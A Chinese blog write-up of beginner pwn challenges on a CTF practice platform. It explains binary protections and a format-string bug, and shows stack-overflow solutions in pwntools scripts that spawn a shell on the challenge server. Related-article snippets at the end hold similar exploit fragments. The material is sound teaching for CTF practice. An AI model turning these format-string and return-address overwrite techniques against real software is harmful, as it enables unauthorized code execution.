攻防世界 pwn练习区解法 write up

最新推荐文章于 2022-10-03 20:52:56 发布
最新推荐文章于 2022-10-03 20:52:56 发布
阅读量841 收藏 2
点赞数 1
分类专栏: 二进制漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46441427/article/details/113275712
版权

目录

cgfsb

先checksec一下,确定程序的保护机制,没有开启PIE。在这里插入图片描述

stack:

canary found 是指运行程序时,会把canary取出放入一个rbp定向的值,在退出函数前将rbp定向的值和canary的值进行一个比较(异或一下,看是不是0),如果不相等,则运行_stack_chk_fail函数

NX

数据所在的内存为不可执行,程序溢出转为shellcode时,程序会去在数据页面上执行指令,这个时候CPU抛出异常,不会让它执行

PIE

程序装在随机的地址

ASLR

即使文件开启了PIE保护,还需要开启ASLR才会真正打乱基址

然后我们确定是32位丢到32位IDA,按下F5在这里插入图片描述
这里看到printf函数没有指定format,存在格式化字符串漏洞,关于格式化字符串漏洞,这个师傅的博客讲得很清楚,这里我就偷个懒。且指定了pwnme=8才给我们flag,且pwnme在bss段那就行了,这里也有个师傅讲bss,我也码住在这里插入图片描述
那我们可以开始确定偏移量了

在这里插入图片描述
aaa和61间有10个的距离,写exp,分析在中间

##!/usr/bin/env python
from pwn import *
sh = remote('111.200.241.244','30762')
payload = p32(0x0804A068)  + 'aaaa%10$n'
sh.recvuntil('please tell me your name:\n')
sh.sendline('pwnyou')
sh.recvuntil('leave your message please:\n')
sh.sendline(payload)
sh.interactive()

payload中,我们先输入的是pwnme的地址,这样的话,如果是一个有效的字符串的首地址,就可以用%s将其打印出来,用地址加串的方式就可以打印出来,‘aaaa’是为了和之前p32()对应,这样前面有了八个字节,10$就是我们刚刚求的偏移,我们输入后是把这个的ascii存在后面的10的,后面的%n就是因为前面输入了8个字符,所以这个时候%n把pwnme赋值成8了,参考是这位师傅的博客
如果简单点来说,就是先构造8,然后把8给地址为0下04A068的那个值
相当于printf(‘p32()aaaa%$10n’,……此处省略十个内存所存值……pwnme),也就是把pwnme的值变成8了

hello pwn

在这里插入图片描述

checksec 发现是64位,直接用64位ida打开在这里插入图片描述
put的我们不管了,都是直接打印在屏幕上的
read函数我们直接看它存的是哪里?是601068
然后我们看这个if条件,if条件让60106c和1853186401这一串比较
但是这个内存的数字之前没有提到,但我们之前输入的数是在68里的,如果溢出会溢出到6C
尝试exp在这里插入图片描述
可以连上去,但是没有打印flag
修改一下,发现没有加p64()。。。。。。。。。


##!/usr/bin/env python
from pwn import *
sh = remote('111.200.241.244','52450')
sh.sendline('A' * 4 + p64(1853186401))
sh.interactive()

level0

在这里插入图片描述
没有canary,PIE关闭,栈不可执行,我们可以溢出,但是不能将shellcode写在栈上,因为现在栈上的代码不会执行

查看main函数,看不出来什么明显漏洞格式,但我们结合打开程序的结果可以知道,会打印一个hello world,然后不动,我们输入了一个5就退出了程序。这里要我们输入了,应该会有溢出点,找一下我们常说的高危函数。

在这里插入图片描述在这里插入图片描述
快速做法:
如下图,这里有一个red函数,这个buf指的是一个局部变量,调用read时把buf的数据存入到缓冲区里面

在这里插入图片描述
点buf追踪,定义了128长度的缓冲区长度,这里的r是返回地址,s是ebp,我们用一些很长的数据覆盖ebp,把我们想执行的指令的地址放到r上面就行了在这里插入图片描述
我们要执行的是system函数,在框框里面找到callsystem在这里插入图片描述
选0x400596作为我们的返回地址在这里插入图片描述
这里128加8,因为是64位的,所以payload就应该是136加上 0x400596

练习工具式解法:
这里我们要用到peda,安装口令谷歌上有,提醒要换源哈在这里插入图片描述
利用peda生成一个200的随机序列在这里插入图片描述

运行后把我们这一窜字符复制,输入在这里插入图片描述
这里是register窗口,我们复制ebp的数据,然后用命令,pattern oddset 字符串就可以看到和ebp之间的偏移是多少了在这里插入图片描述
是128,可能有同学不明白为什么是ebp之前的,那我们做个实验在这里插入图片描述
看,所以之前那些指的就是ebp之前的值,所以我们很容易得到136 + 地址的payload

##!/usr/bin/env python
from pwn import *
sh = remote('111.200.241.244','33108')
sh.recvuntil('Hello, World\n')   #注意这里是它先打印hello world我们再输入
sh.sendline('A' * 136 + p64(0x400596))
sh.interactive()

得到flag:
在这里插入图片描述

when did you born

在这里插入图片描述

老方法,还是checksec,拖进ida分析,没有PIE,但是有canary

在这里插入图片描述

我们同时可以结合运行结果,进行分析,发现它会问

最低0.47元/天 解锁文章
Akura@lan
关注
专栏目录
攻防世界base除4_攻防世界pwn新手训练
weixin_36310597的博客
12-24 588
小白刚开始接触pwn,做点新手训练了解一下pwn是干啥的。一开始啥漏洞都不知道,很多都是看别人的wp才知道要干嘛,比如才知道原来printf函数也是有漏洞的。 把这些题的思路和做法记录下来,不然我这鱼的记忆肯定过几天就又忘了get_shell题目描述:运行就能拿到shell呢,真的如题,nc连接,连接直接就是shell,直接cat flag就可以了。CGfsb题目描述:菜鸡面对着pringf发愁,...
攻防世界-pwn1-Writeup
SkYe's Blog
05-13 420
pwn1 考点:栈溢出,canary绕过 基本情况 程序实现功能是往栈上读写数据。 保护措施 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 栈溢出 ...... while ( 1 ) { menu(); v3 = my_input(); switch ( v3 ) {
攻防世界新手pwnwriteup
thinker11的博客
01-28 1577
level2 1.查壳 2.IDA分析 进入vulnerable_function函数 读入的值明显大于buf自身的大小 又有system函数,就差/bin/sh了 接下来我们 SHIFT+F12 双击system函数,得到地址 0x8048320 双击binsh,得到地址 0x0804a024 双击buf,得到buf到返回地址的偏移 0x88+4=140 3.EXP from pwn ...
攻防世界新手pwn writeup
09-08 253
CGfsb 题目地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5050 下载文件后,使用file命令查看。 32位的文件,用ida打开,F5查看伪代码。 printf漏洞:https://www.cnblogs.com/cfans1993/articles...
攻防世界 -pwn1
TedLau的博客
04-22 919
0x00 前言 首次做到跟canary绕过有关的知识,就准备写点东西记录下。 64位,保护几乎全开了。不慌,慌也没用。 0x10 分析 运行可以发现几个功能,就是说:1选项是保存你将要输入的内容,2就是打印你之前输入的内容,3就是退出。 0x11 ida分析 main函数 在main函数中发现了canary, canary的值在程序每一次运行都是会改...
攻防世界 pwn进阶解法 write up(一)
qq_46441427的博客
03-01 400
实时数据监测 找信息 没有发现canary,没有开启PIE和NX 查看ida 发现有一个printf,这里是fgets,可能会用到格式化字符串漏洞,运行一下程序 结合ida的分析我们可知,要把这个值改成0x2223322,那结合之前的printf,可以确定是格式化字符串漏洞 给了我们地址,那我们的payload就以地址为开头,因为是p32,所以后面35795746要减4,构成%35795742d%偏移量n$ 然后确定偏移量: 总共,从A到41包括A有12个,偏移量=12 所以得到payload
攻防世界PWN进阶(warmup)
BurYiA的博客
02-03 1548
warmup 这是一个没有附件的题,看起来题目是要求我们fuzz了 nc连接上后可以发现有个输入点,并且还给了我们一个十六进制数,看起来是个地址 那首先根据这些我们可以先将fuzz函数写出来,分三种情况(不用他给的地址,用p32发送,用p64送) def fuzz(r, num, flag): payload = 'a' * num if flag==1: pa...
攻防世界pwn新手整理
Lenard404的博客
08-19 3177
小白尝试做pwn题QAQ get shell 惯例: IDA查看main函数: 显然直接连接就可以得到权限。 nc ls cat 一条龙服务: 菜鸟教程的Linux命令大全 hello pwn 惯例: IDA查看main: 查看if语句后的函数: 目的明确:进入if语句。 计算60106C和601068的偏移为4,read可以读入0x10,直接输入条件即可。 exp: from pwn import* r = remote('111.200.241.244',64067) payload = '
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 440
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
pwn 练习
zip471642048的博客
05-31 435
文章目录read_shellcode read_shellcode 师傅出的一个栈溢出的题,思路就是利用read往bss段写入shellcode然后调用 日常checksec一下,啥都没开 运行主程序可以看出来,程序读入了一个字符串无打印 gdb调试的时候可以看到是调用了plt的read函数,说明他读入字符串是用的read@plt,我们可以用read往栈或者bss段写东西,或者利用gadget系统调用 这么几个gadget明显不够,系统调用pass 可以看到栈可以读可写,bss段也是
PWN练习网站
GJQI12的专栏
04-10 2201
1.什么是PWF CTF比赛主要表现以下几个技能上:逆向工程、密码 学、ACM编程、Web漏洞、二进制溢出、网络和取证等。在国际CTF赛事中,二进制溢出也称之为PWNPWN是一个黑客语法的俚语词,自"own"这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的 情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被...
pwn练习 2022.10.03
m0_53932372的博客
10-03 185
pwn
攻防世界pwn新手练习(hello_pwn
BurYiA的博客
10-24 3751
hello_pwn 拿到程序后,我们首先checksec一下 可以看到是64位程序,好的是这次只开了NX(堆栈不可执行),ok,我们跑一下程序看看 可以看到它是一个输入,然后就啥都没有了emmmm…好吧,咱们继续放到IDA里面看看 ...
PWN综合练习
WateranFire的博客
10-27 465
合天上的课程笔记 dup2(socket,0)——将socket与标准输入绑定 dup2(socket,1)——将socket与标准输出绑定 realpath(name,&resolved)——将name中的路径转为绝对路径存入resolved 就算realpath调用失败,resolved内还是会填充数据,并且前缀会加上当前路径,构造shellcode时需要注意 有时应该打印出了内容但接
攻防世界-pwn 新手练习
hanqdi_的博客
02-24 2378
when_the_your_born 要求v5=1926即可得到flag,而根据程序,v5只要等于1926就进入不了这个分支,也就是说,我们输入的v5不能等于1926。 这里可以利用gets函数的输入v4,来覆盖v5。 v4:ebp-0x20 v5:ebp-0x18 v4和v5相差0x08,即在输入v4时,先输入0x08个垃圾数据,在输入1926即可实现覆盖。 payload如下 from pw...
攻防世界 pwn 新手练习 hello_pwn
ChaoYue_miku的博客
07-06 532
题目来源: NUAACTF 题目描述:pwn!,segment fault!菜鸡陷入了深思 ** 0、下载附件,使用checksec检查保护情况,尝试打开文件 ** 开启了NX部分RELRO ** 1、使用IDA 64 Pro打开文件 ** 查看main函数 发现了一个read函数,查看一下unk_601068的栈结构 这里是存在栈溢出的,只要覆盖4个字节的内容就可以更改dword_60106C的内容。 接着往后查看main函数: 有一个if条件判断,只要满足dword_60106C == 18531
pwn 练习笔记 暑假第七天
SsMing的博客
07-19 414
题目来自:https://www.jarvisoj.com/challenges level3 checksec查看: ida打开: 栈溢出,buf与ebp相距0x88(136) 一起下载到的还有个libc-2.19.so动态链接库文件,这就很好办啦!二次溢出拿到flag 直接上脚本: from pwn import * #sh = process('level3') ...
攻防世界 pwn repeater
最新发布
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值